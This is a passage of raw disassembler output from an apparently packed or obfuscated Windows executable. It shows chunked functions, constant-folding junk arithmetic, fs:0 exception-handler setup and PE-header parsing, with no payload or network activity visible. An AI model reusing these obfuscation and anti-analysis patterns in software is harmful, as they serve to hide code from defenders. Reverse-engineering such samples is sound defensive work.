loc_42A4B0: ; CODE XREF: sub_428F20+1241�j
jmp loc_423B33
; END OF FUNCTION CHUNK FOR sub_428F20
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_245. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425A93
loc_42A4B6: ; CODE XREF: sub_425A93+19�j
jmp loc_42DC0C
; END OF FUNCTION CHUNK FOR sub_425A93
; ---------------------------------------------------------------------------
loc_42A4BB: ; CODE XREF: _0182ofla:004247E2�j
jmp loc_429F1C
; ---------------------------------------------------------------------------
locret_42A4C0: ; CODE XREF: _0182ofla:loc_42A947�j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426B01
loc_42A4C1: ; CODE XREF: sub_426B01-1C0C�j
jmp loc_42D471
; END OF FUNCTION CHUNK FOR sub_426B01
; =============== S U B R O U T I N E =======================================
sub_42A4C6 proc near ; CODE XREF: _0182ofla:00429366�p
; _0182ofla:0042CE6E�j
var_8 = dword ptr -8
; FUNCTION CHUNK AT 004252DE SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0042A477 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042CFC7 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042D244 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042DE8A SIZE 00000025 BYTES
mov [esp+0], ebx
pop ebx
push 0AA8E8B1Fh
pop eax
rol eax, 11h
sub eax, 843DC7FDh
xor eax, 0F88973ADh
add eax, ebp
jmp loc_42D244
sub_42A4C6 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B1F9
loc_42A4E6: ; CODE XREF: sub_42B1F9:loc_4290EB�j
popf
push 533CB019h
jmp loc_42A2BE
; END OF FUNCTION CHUNK FOR sub_42B1F9
; ---------------------------------------------------------------------------
loc_42A4F1: ; CODE XREF: _0182ofla:loc_426F18�j
pop ebx
pop ebp
jmp loc_426EE7
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
call sub_42D1C4
; START OF FUNCTION CHUNK FOR sub_4254D3
loc_42A500: ; CODE XREF: sub_4254D3+8F9�j
mov eax, [ebp+arg_0]
cmp dword ptr [eax-0Ch], 4
jnz loc_42A516
add [ebp+var_8], 4
jmp loc_423B19
; ---------------------------------------------------------------------------
loc_42A516: ; CODE XREF: sub_4254D3+5034�j
add [ebp+var_8], 2
loc_42A51A: ; CODE XREF: sub_425629:loc_423ECA�j
jmp loc_425DD5
; END OF FUNCTION CHUNK FOR sub_4254D3
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42A51F proc near ; CODE XREF: sub_425B00+D2B�p
; sub_425B00+77BF�p
; FUNCTION CHUNK AT 0042C94B SIZE 00000005 BYTES
push ebp
mov ebp, esp
push offset sub_42ACCF
jmp loc_42C94B
sub_42A51F endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_70. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_42A52D: ; CODE XREF: _0182ofla:0042D404�j
jmp locret_426D4C
; ---------------------------------------------------------------------------
adc ebp, 0AB867CCEh
jmp sub_4294FE
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_120. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428D63
loc_42A53E: ; CODE XREF: sub_428D63+4FFC�j
jmp loc_426551
; END OF FUNCTION CHUNK FOR sub_428D63
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424184
loc_42A543: ; CODE XREF: sub_424184:loc_42B8E4�j
call sub_42E574
; END OF FUNCTION CHUNK FOR sub_424184
; START OF FUNCTION CHUNK FOR sub_424E6E
loc_42A548: ; CODE XREF: sub_424E6E+D�j
jmp loc_4251A5
; END OF FUNCTION CHUNK FOR sub_424E6E
; ---------------------------------------------------------------------------
loc_42A54D: ; CODE XREF: _0182ofla:0042399C�j
jmp loc_42743A
; ---------------------------------------------------------------------------
loc_42A552: ; CODE XREF: _0182ofla:0042A214�j
rol eax, 4
; START OF FUNCTION CHUNK FOR sub_42430D
loc_42A555: ; CODE XREF: sub_42430D:loc_42A1FE�j
add ecx, 0EA2666B0h
xchg ecx, [esp+4+var_4]
jmp loc_42308B
; END OF FUNCTION CHUNK FOR sub_42430D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423A2A
loc_42A563: ; CODE XREF: sub_423A2A+85A�j
pop edi
popf
jmp loc_4269B2
; END OF FUNCTION CHUNK FOR sub_423A2A
; ---------------------------------------------------------------------------
loc_42A56A: ; CODE XREF: _0182ofla:loc_4230DA�j
push offset loc_429D61
jmp loc_42DC5A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D056
loc_42A574: ; CODE XREF: sub_42D056:loc_42EC88�j
jnz loc_4255AA
loc_42A57A: ; CODE XREF: _0182ofla:00425EC0�j
jmp loc_42A8E3
; END OF FUNCTION CHUNK FOR sub_42D056
; ---------------------------------------------------------------------------
sbb ecx, ebp
jz loc_42A8CB
and eax, 4E14E7B0h
jmp loc_4255A5
; =============== S U B R O U T I N E =======================================
sub_42A592 proc near ; CODE XREF: _0182ofla:0042C946�p
xchg eax, [esp+0]
mov eax, [esp+0]
call sub_42DBF0
push ebx
push 48BA5979h
pop ebx
push offset sub_428E08
jmp nullsub_240
sub_42A592 endp
; ---------------------------------------------------------------------------
push 0C072D16Eh
push ebp
jmp sub_42C677
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42461C
loc_42A5B9: ; CODE XREF: sub_42461C+BB7�j
xchg edi, [esp+4+var_4]
jmp sub_429BB9
; END OF FUNCTION CHUNK FOR sub_42461C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42798F
loc_42A5C1: ; CODE XREF: sub_42798F:loc_427A01�j
push ecx
jmp loc_42A1F9
; END OF FUNCTION CHUNK FOR sub_42798F
; ---------------------------------------------------------------------------
loc_42A5C7: ; CODE XREF: _0182ofla:00427989�j
jnz loc_428C9D
jmp loc_42C759
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42798F
loc_42A5D2: ; CODE XREF: sub_42798F-35CE�j
jnz loc_428C3D
jmp loc_4287FD
; END OF FUNCTION CHUNK FOR sub_42798F
; ---------------------------------------------------------------------------
loc_42A5DD: ; CODE XREF: _0182ofla:loc_4243A1�j
mov eax, [ebp+8]
cmp dword ptr [eax-1Ch], 0F6h
jz loc_4270F9
mov eax, [ebp+8]
cmp dword ptr [eax-1Ch], 0F7h
jmp loc_4270F3
; =============== S U B R O U T I N E =======================================
sub_42A5FC proc near ; CODE XREF: _0182ofla:00423013�j
; sub_427BA0+C�p
; FUNCTION CHUNK AT 00429917 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042E4D1 SIZE 00000011 BYTES
mov [esp+0], edi
pop edi
push eax
call sub_42DBF0
loc_42A606: ; CODE XREF: sub_423057:loc_424893�j
mov ds:dword_42A3B4, eax
lea eax, [ebp-14h]
jmp loc_429917
sub_42A5FC endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C89F
loc_42A613: ; CODE XREF: sub_42C89F+1C�j
xchg esi, [esp+0]
jmp sub_42892E
; END OF FUNCTION CHUNK FOR sub_42C89F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A181
loc_42A61B: ; CODE XREF: sub_42A181-2A4B�j
sbb ebx, edx
jmp loc_426F44
; END OF FUNCTION CHUNK FOR sub_42A181
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42493A
loc_42A622: ; CODE XREF: sub_42493A+1�j
cmp esi, 40D23369h
jmp loc_4272EE
; END OF FUNCTION CHUNK FOR sub_42493A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42798F
loc_42A62D: ; CODE XREF: sub_42798F+3273�j
cdq
jmp loc_42ABE9
; END OF FUNCTION CHUNK FOR sub_42798F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428D63
loc_42A633: ; CODE XREF: sub_428D63:loc_42A0CF�j
cmp dword ptr [ebp-4], 2
jnz loc_42ABE9
jmp loc_4283AF
; END OF FUNCTION CHUNK FOR sub_428D63
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42A642 proc near ; DATA XREF: sub_42417A�o
var_4 = dword ptr -4
; FUNCTION CHUNK AT 004242D8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004254CE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00425D7A SIZE 0000000F BYTES
; FUNCTION CHUNK AT 004276B4 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042836D SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00428668 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004293DD SIZE 00000009 BYTES
; FUNCTION CHUNK AT 0042CDB9 SIZE 00000024 BYTES
push ebp
mov ebp, esp
push ecx
mov esp, ebp
xchg ebx, [esp+4+var_4]
jmp loc_4242D8
sub_42A642 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426993
loc_42A650: ; CODE XREF: sub_426993+13�j
jz loc_42E53F
jmp loc_425CB7
; END OF FUNCTION CHUNK FOR sub_426993
; ---------------------------------------------------------------------------
loc_42A65B: ; CODE XREF: _0182ofla:0042A846�j
sbb edx, ecx
shl edi, 2
push 53148775h
jg loc_42A2E5
jmp loc_429F48
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423FE2
loc_42A670: ; CODE XREF: sub_42486B+B�j
; sub_423FE2:loc_427746�j
jz loc_42DD4D
jmp loc_42DE16
; END OF FUNCTION CHUNK FOR sub_423FE2
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_77. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C553
loc_42A67C: ; CODE XREF: sub_42C553+701�j
jmp loc_42487B
; END OF FUNCTION CHUNK FOR sub_42C553
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AB27
loc_42A681: ; CODE XREF: sub_42AB27:loc_426812�j
push esi
push 42FD5B0Ah
pop esi
and esi, 0CD1FEA3Dh
cmp esi, 1925C9DBh
jmp loc_424CA3
; END OF FUNCTION CHUNK FOR sub_42AB27
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428A39
loc_42A699: ; CODE XREF: sub_428A39:loc_429512�j
; _0182ofla:loc_42AB38�j
push offset loc_424508
jmp loc_42DEB5
; END OF FUNCTION CHUNK FOR sub_428A39
; ---------------------------------------------------------------------------
test eax, eax
jz loc_428547
push 2
push 400h
jmp loc_42B424
; ---------------------------------------------------------------------------
or ebp, 6E5381A6h
jmp sub_42D333
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424950
loc_42A6C2: ; CODE XREF: sub_424950+F�j
call sub_42894D
; END OF FUNCTION CHUNK FOR sub_424950
; START OF FUNCTION CHUNK FOR sub_42883C
loc_42A6C7: ; CODE XREF: sub_42883C+2A�j
jmp loc_42D59E
; END OF FUNCTION CHUNK FOR sub_42883C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C677
loc_42A6CC: ; CODE XREF: sub_42C677-43D�j
xor eax, eax
pop ecx
retn
; END OF FUNCTION CHUNK FOR sub_42C677
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E2B3
loc_42A6D0: ; CODE XREF: sub_42E2B3+D�j
jmp sub_428D17
; END OF FUNCTION CHUNK FOR sub_42E2B3
; =============== S U B R O U T I N E =======================================
sub_42A6D5 proc near ; CODE XREF: sub_42798F-2B42�p
var_8 = dword ptr -8
; FUNCTION CHUNK AT 004243FD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00424AD7 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0042659A SIZE 0000000D BYTES
; FUNCTION CHUNK AT 004278EA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00429E96 SIZE 00000013 BYTES
push dword ptr fs:0
mov fs:0, esp
jmp loc_424AD7
sub_42A6D5 endp
; =============== S U B R O U T I N E =======================================
sub_42A6E6 proc near ; DATA XREF: _0182ofla:0042536C�o
var_4 = dword ptr -4
push eax
push 0AC869F52h
pop eax
sub eax, 0CB57E46Bh
add eax, 1F1377F7h
xchg eax, [esp+4+var_4]
jmp sub_42D71D
sub_42A6E6 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4271D2
loc_42A701: ; CODE XREF: sub_4271D2:loc_42A11B�j
xor edi, ebx
or edx, 0C16729B4h
push esi
or eax, 95160523h
pushf
jmp loc_429C31
; END OF FUNCTION CHUNK FOR sub_4271D2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424289
loc_42A716: ; CODE XREF: sub_424289:loc_428E23�j
mov eax, [ebp-4]
add eax, 3Ch
mov eax, [eax]
add eax, [ebp-4]
add eax, 18h
jmp loc_423955
; END OF FUNCTION CHUNK FOR sub_424289
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E5F8
loc_42A729: ; CODE XREF: sub_42E5F8-382B�j
; sub_42E5F8:loc_42CF73�j
mov eax, [ebp-4]
movzx eax, word ptr [eax+6]
push edi
push 0E5FDC2F8h
jmp loc_42D477
; END OF FUNCTION CHUNK FOR sub_42E5F8
; ---------------------------------------------------------------------------
loc_42A73B: ; DATA XREF: sub_42926C+1D�o
lea eax, [ebp-14h]
push eax
; START OF FUNCTION CHUNK FOR sub_4247FE
loc_42A73F: ; CODE XREF: sub_4247FE:loc_42877C�j
call sub_42DBF0
mov ds:dword_427A14, eax
mov ds:byte_427A00, 1
lea eax, [ebp-14h]
jmp loc_4260A3
; END OF FUNCTION CHUNK FOR sub_4247FE
; ---------------------------------------------------------------------------
loc_42A758: ; CODE XREF: _0182ofla:0042B31C�j
jbe loc_42DF38
xchg ebx, edx
; =============== S U B R O U T I N E =======================================
sub_42A760 proc near ; CODE XREF: sub_428041-4021�p
; FUNCTION CHUNK AT 00423A6B SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00428BF8 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00429792 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042A16E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042A8BD SIZE 0000001F BYTES
; FUNCTION CHUNK AT 0042C39A SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0042CB87 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042CBDB SIZE 0000000B BYTES
mov [esp+0], edi
pop edi
cmp dword ptr [ebp-0Ch], 0
jmp loc_42CBDB
sub_42A760 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425B00
loc_42A76D: ; CODE XREF: sub_425B00:loc_42CB94�j
mov eax, [ebp-20h]
call sub_4254D3
pop ecx
mov [ebp-20h], eax
loc_42A779: ; CODE XREF: sub_425B00:loc_42644B�j
; sub_425B00+359A�j ...
mov eax, [ebp-20h]
jmp loc_42D9C8
; END OF FUNCTION CHUNK FOR sub_425B00
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423B53
loc_42A781: ; CODE XREF: sub_423B53:loc_427687�j
call sub_42AAF8
loc_42A786: ; CODE XREF: sub_42C8C0-6B67�j
; sub_42A092:loc_429E73�j
push eax
push 0D9A20071h
pop eax
add eax, 26A09CD9h
xchg eax, [esp+4+var_4]
jmp sub_428D17
; END OF FUNCTION CHUNK FOR sub_423B53
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42798F
loc_42A79B: ; CODE XREF: sub_42798F:loc_427A4D�j
mov [ebp-4], eax
loc_42A79E: ; CODE XREF: _0182ofla:00426A2E�j
; _0182ofla:0042CBB8�j ...
dec ds:dword_42577C
mov eax, [ebp-4]
pop ecx
jmp loc_42B368
; END OF FUNCTION CHUNK FOR sub_42798F
; ---------------------------------------------------------------------------
locret_42A7AD: ; CODE XREF: _0182ofla:loc_42D209�j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D056
loc_42A7AE: ; CODE XREF: sub_42D056-9602�j
; sub_42D056:loc_42ECC5�j
call sub_428D09
push 2CBBA541h
pop edx
xor edx, ds:4000F3h
add edx, 65B16449h
test edx, 1000h
jmp loc_42EC88
; END OF FUNCTION CHUNK FOR sub_42D056
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42798F
loc_42A7D0: ; CODE XREF: sub_42798F-4296�j
; _0182ofla:0042451D�j ...
push offset loc_42CA1D
jmp loc_42A942
; END OF FUNCTION CHUNK FOR sub_42798F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E648
loc_42A7DA: ; CODE XREF: sub_42E648-5757�j
xor edx, 0FD881E3Dh
add edx, 0DBF38D70h
xchg edx, [esp+4+var_4]
jmp loc_42482D
; END OF FUNCTION CHUNK FOR sub_42E648
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429AE0
loc_42A7EE: ; CODE XREF: sub_429AE0:loc_423579�j
; _0182ofla:0042863B�j
mov edi, ebx
xchg edi, [esp+8+var_8]
xchg esi, ebx
push edi
mov esi, eax
jmp loc_425027
; END OF FUNCTION CHUNK FOR sub_429AE0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42380D
loc_42A7FD: ; CODE XREF: sub_42380D:loc_4291B5�j
mov [ecx], eax
add ecx, 4
mov [ecx], eax
add ecx, 0A0h
mov dword ptr [ecx], offset loc_42EA80
jmp loc_427AFE
; END OF FUNCTION CHUNK FOR sub_42380D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425B6E
loc_42A818: ; CODE XREF: sub_425B6E:loc_427703�j
lea edx, [ebp+var_14]
push 0A39410ABh
pop eax
sub eax, 9D8DD022h
or eax, 0B79785B8h
add eax, 48AB0C67h
call sub_42B14D
lea eax, [ebp+var_14]
jmp loc_428825
; END OF FUNCTION CHUNK FOR sub_425B6E
; ---------------------------------------------------------------------------
loc_42A840: ; CODE XREF: _0182ofla:loc_42B293�j
jnz loc_429F48
jmp loc_42A65B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A2FA
loc_42A84B: ; CODE XREF: sub_42A2FA:loc_427297�j
mov edx, [ebp-18h]
; END OF FUNCTION CHUNK FOR sub_42A2FA
; START OF FUNCTION CHUNK FOR sub_42D056
loc_42A84E: ; CODE XREF: sub_42D056:loc_42C98A�j
shr edx, 3
mov ecx, ds:dword_423190
or [ecx+edx], al
push 0D963E982h
pop ecx
and ecx, 0AE955C83h
add ecx, 4B1361E7h
jmp loc_42D45F
; END OF FUNCTION CHUNK FOR sub_42D056
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_158. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_42A872: ; CODE XREF: _0182ofla:0042C20D�j
jmp loc_42612B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4289E4
loc_42A877: ; CODE XREF: sub_4289E4-713�j
jmp loc_429FB4
; END OF FUNCTION CHUNK FOR sub_4289E4
; ---------------------------------------------------------------------------
loc_42A87C: ; CODE XREF: _0182ofla:004236CB�j
adc edx, ecx
popf
mov esi, 497508E6h
loc_42A884: ; CODE XREF: _0182ofla:loc_4236B5�j
rol eax, 1Eh
xor eax, 334A0C81h
push offset loc_4245B2
jmp locret_42E696
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E218
loc_42A897: ; CODE XREF: sub_42E218:loc_427F19�j
jz loc_4280E1
jmp loc_423691
; END OF FUNCTION CHUNK FOR sub_42E218
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423FCD
loc_42A8A2: ; CODE XREF: sub_423FCD:loc_423198�j
push 0BA6E4669h
xchg edx, [esp+4+var_4]
mov esi, edx
pop edx
add esi, 45D4A287h
mov [esi], eax
xchg ecx, [esp+0]
jmp loc_42A3D5
; END OF FUNCTION CHUNK FOR sub_423FCD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A760
loc_42A8BD: ; CODE XREF: sub_42A760-6CE7�j
jp loc_4236F3
xchg edi, ecx
loc_42A8C5: ; CODE XREF: sub_42A760:loc_428BF8�j
push 0A384F6F8h
pop eax
loc_42A8CB: ; CODE XREF: _0182ofla:0042A581�j
and eax, 0D9096AA9h
add eax, 651C5D6Dh
jmp loc_42A16E
; END OF FUNCTION CHUNK FOR sub_42A760
; ---------------------------------------------------------------------------
loc_42A8DC: ; CODE XREF: _0182ofla:0042C448�j
test edi, eax
jmp loc_429057
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D056
loc_42A8E3: ; CODE XREF: sub_42D056:loc_42A57A�j
xchg eax, ebp
call sub_42B3C2
jmp loc_426DEE
; END OF FUNCTION CHUNK FOR sub_42D056
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426571
loc_42A8EF: ; CODE XREF: sub_426571+12�j
mov eax, [ebp-4]
cmp word ptr [eax], 2ECDh
jz loc_42A902
jmp loc_4255F9
; ---------------------------------------------------------------------------
loc_42A902: ; CODE XREF: sub_426571+C�j
; sub_426571+4386�j
jno loc_42624D
mov eax, [ebp-4]
call sub_428EAF
jmp loc_42875E
; END OF FUNCTION CHUNK FOR sub_426571
; =============== S U B R O U T I N E =======================================
sub_42A915 proc near ; CODE XREF: _0182ofla:00423AAC�j
; sub_42D056:loc_42D45F�p
; FUNCTION CHUNK AT 0042398C SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00423FDD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00427CFA SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00429FA8 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0042CC1F SIZE 0000000A BYTES
xchg ebx, [esp+0]
pop ebx
add ecx, ebp
loc_42A91B: ; CODE XREF: sub_42D833:loc_42D8CA�j
add ecx, 2CEB557Bh
call sub_4233EC
loc_42A926: ; CODE XREF: _0182ofla:004277C5�j
jmp loc_427CFA
sub_42A915 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42448C
loc_42A92B: ; CODE XREF: sub_42448C+1B3D�j
; sub_42798F+DB�j
jz loc_4297F8
jmp loc_4278E0
; END OF FUNCTION CHUNK FOR sub_42448C
; ---------------------------------------------------------------------------
or ebx, 5C66DB71h
jmp loc_4230C2
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_40. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42798F
loc_42A942: ; CODE XREF: sub_42798F+2E46�j
jmp nullsub_68
; END OF FUNCTION CHUNK FOR sub_42798F
; ---------------------------------------------------------------------------
loc_42A947: ; CODE XREF: _0182ofla:0042A321�j
jmp locret_42A4C0
; ---------------------------------------------------------------------------
mov ebp, 876AD914h
jmp sub_423AF2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429E52
loc_42A956: ; CODE XREF: sub_429E52-181C�j
mov ecx, [esi]
push 6C800985h
loc_42A95D: ; CODE XREF: sub_429E52:loc_42468A�j
lea eax, [ebp-2AAh]
cmp dword ptr [eax], 47424454h
jz loc_42595F
jmp loc_42483C
; END OF FUNCTION CHUNK FOR sub_429E52
; ---------------------------------------------------------------------------
jo loc_427E9E
jmp sub_429071
; ---------------------------------------------------------------------------
ror edi, 4
jmp sub_42D8EA
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_88. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A3E4
loc_42A988: ; CODE XREF: sub_42A3E4-153A�j
jmp loc_42EABE
; END OF FUNCTION CHUNK FOR sub_42A3E4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424A70
loc_42A98D: ; CODE XREF: sub_424A70:loc_4257D4�j
mov esp, ebp
pop ebp
jmp loc_427EFE
; END OF FUNCTION CHUNK FOR sub_424A70
; =============== S U B R O U T I N E =======================================
sub_42A995 proc near ; CODE XREF: sub_429AA3:loc_4248AE�j
add esp, 0FFFFFFF4h
call sub_42CDEB
loc_42A99D: ; CODE XREF: _0182ofla:00427028�j
jmp nullsub_145
sub_42A995 endp
; ---------------------------------------------------------------------------
mov eax, 0F5C44DD4h
jmp sub_4235C7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42EAB7
loc_42A9AC: ; CODE XREF: sub_42EAB7:loc_429B8C�j
jz loc_42D607
loc_42A9B2: ; CODE XREF: _0182ofla:00425770�j
; sub_42AFBA+14�j
jnz loc_42C74A
cmp dword ptr [ebp-1Ch], 0Fh
jnz loc_4287A3
mov eax, [ebp-1Ch]
shl eax, 8
mov edx, [ebp-20h]
movzx edx, byte ptr [edx]
jmp loc_4285F9
; END OF FUNCTION CHUNK FOR sub_42EAB7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423127
loc_42A9D3: ; CODE XREF: sub_423127+2102�j
lea eax, [ebp-10h]
push eax
push 7
call sub_42371C
push eax
push edi
jmp loc_425BD4
; END OF FUNCTION CHUNK FOR sub_423127
; ---------------------------------------------------------------------------
xor ebp, ecx
jmp loc_42C905
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_98. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429D83
loc_42A9ED: ; CODE XREF: sub_429D83+10�j
jmp nullsub_69
; END OF FUNCTION CHUNK FOR sub_429D83
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423395
loc_42A9F2: ; CODE XREF: sub_423395+10�j
; sub_42E395-4839�j ...
js loc_425076
push 0C9ED3936h
pop eax
rol eax, 9
sub eax, 0E6C839AFh
add eax, 0E835C4ADh
push offset sub_42C311
jmp loc_42D239
; END OF FUNCTION CHUNK FOR sub_423395
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_117. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424BCB
loc_42AA18: ; CODE XREF: sub_424BCB-CA3�j
jmp loc_426B31
; END OF FUNCTION CHUNK FOR sub_424BCB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428EB9
loc_42AA1D: ; CODE XREF: sub_428EB9+570A�j
pop ecx
retn
; END OF FUNCTION CHUNK FOR sub_428EB9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42EAB7
loc_42AA1F: ; CODE XREF: sub_42EAB7-5E15�j
jmp loc_4287CC
; END OF FUNCTION CHUNK FOR sub_42EAB7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42798F
loc_42AA24: ; CODE XREF: sub_42798F+54�j
jmp loc_4269BC
; END OF FUNCTION CHUNK FOR sub_42798F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42DD86
loc_42AA29: ; CODE XREF: sub_42DD86-9259�j
jmp loc_4293B2
; END OF FUNCTION CHUNK FOR sub_42DD86
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4249FA
loc_42AA2E: ; CODE XREF: sub_4249FA-427�j
jmp loc_429B29
; END OF FUNCTION CHUNK FOR sub_4249FA
; =============== S U B R O U T I N E =======================================
sub_42AA33 proc near ; CODE XREF: sub_429E52-664F�p
push dword ptr fs:0
mov fs:0, esp
jmp near ptr byte_424FDF
sub_42AA33 endp
; =============== S U B R O U T I N E =======================================
sub_42AA44 proc near ; CODE XREF: sub_42D730-A5B0�j
; FUNCTION CHUNK AT 0042A173 SIZE 00000008 BYTES
push ebx
loc_42AA45: ; CODE XREF: _0182ofla:loc_4240AB�j
push 0D1EA3ED0h
pop ebx
xor ebx, 0EB2CB17Dh
or ebx, 18213DB0h
add ebx, 0C55AA375h
jmp loc_42A173
sub_42AA44 endp
; =============== S U B R O U T I N E =======================================
sub_42AA62 proc near ; CODE XREF: _0182ofla:00424A5A�j
; sub_426993:loc_42E53F�p
mov [esp+0], edi
pop edi
mov eax, 100h
call sub_42D70E
push offset sub_42CC34
jmp nullsub_70
sub_42AA62 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_42AA7A proc near ; CODE XREF: sub_425BF8:loc_4266F2�j
retn
sub_42AA7A endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42798F
loc_42AA7B: ; CODE XREF: sub_42798F+1637�j
jmp nullsub_71
; END OF FUNCTION CHUNK FOR sub_42798F
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_243. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_42AA81: ; CODE XREF: _0182ofla:0042DE85�j
jmp loc_424A18
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42448C
loc_42AA86: ; CODE XREF: sub_42448C+877A�j
jmp loc_42951C
; END OF FUNCTION CHUNK FOR sub_42448C
; ---------------------------------------------------------------------------
loc_42AA8B: ; CODE XREF: _0182ofla:00428222�j
jmp loc_42736F
; ---------------------------------------------------------------------------
loc_42AA90: ; CODE XREF: _0182ofla:0042492A�j
push eax
push 40h
push 52B74B96h
pop eax
